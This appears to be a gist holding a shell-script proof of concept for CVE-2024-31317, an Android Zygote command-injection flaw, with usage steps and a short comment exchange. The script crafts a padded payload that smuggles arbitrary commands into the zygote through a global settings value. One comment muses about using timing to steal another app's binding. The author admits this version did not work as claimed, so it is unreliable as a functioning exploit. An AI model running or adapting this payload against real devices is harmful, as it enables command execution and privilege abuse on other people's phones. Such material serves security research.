CVE-2024-31317 PoC 1

payload.sh

#!/bin/sh
# PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317:
# https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html
#
# Tested on honor-magic-v2_ver-n49; Build 7.2.0.108(C636E1R2P2); Sec patch Dec 1, 2023
#
# USAGE (android 13, with pre-13 use 12200 instead of 32768)
#   host$ adb push payload.sh /sdcard/
#   host$ adb shell
#   shell$ settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 sh -c 'sleep 200')"
#   [disconnect (zygote crash)]
#   host$ adb shell
#   shell$ ps -A | grep sleep
#   root           480     2       0      0 0                   0 S [adspsleepmon-wo]
#   root         20055 19988 11122152  3792 0                   0 S sleep

buffer_size=$1
shift

zygote_read_abort_size=$1
shift

cmd_len=$#
cmd="$1"
shift

prefix="6 --set-api-denylist-exemptions    "
prefix_len=$(echo -n "$prefix" | wc -c)
add_chars=$(($buffer_size - $prefix_len - 1))
payload=$(printf "\n\n\n\n\n%${add_chars}s" $cmd_len  | tr ' ' A)
echo

for arg in "$@"; do
    payload="$payload\n$(echo "$arg")"
done

payload="$payload\n$(echo "$cmd")"
echo "$payload"
payload_len=$(echo "$payload" | wc -c)

add_chars=$(($zygote_read_abort_size - ($prefix_len + $payload_len)))
printf "%${add_chars}s" ',' | tr ' ' ','
echo X

Hi @diabl0w , this the first iteration (PoC1) - works not as I expected. Better check the second one by the link above. In this one I thought that sh sleep is actually caused by my payload, but nope it's caused by some init scripts of android itself...

Okay thanks for the clqrif8cation, I figured that mightve been the case... okay I'll have to try out the v2 and see what I could come up with

I think the issue is mostly in timings - so the legitimate app need to be transferred to zygote in the time of the imposter to get back to system to steal it's binding. But I was unable to get to this point...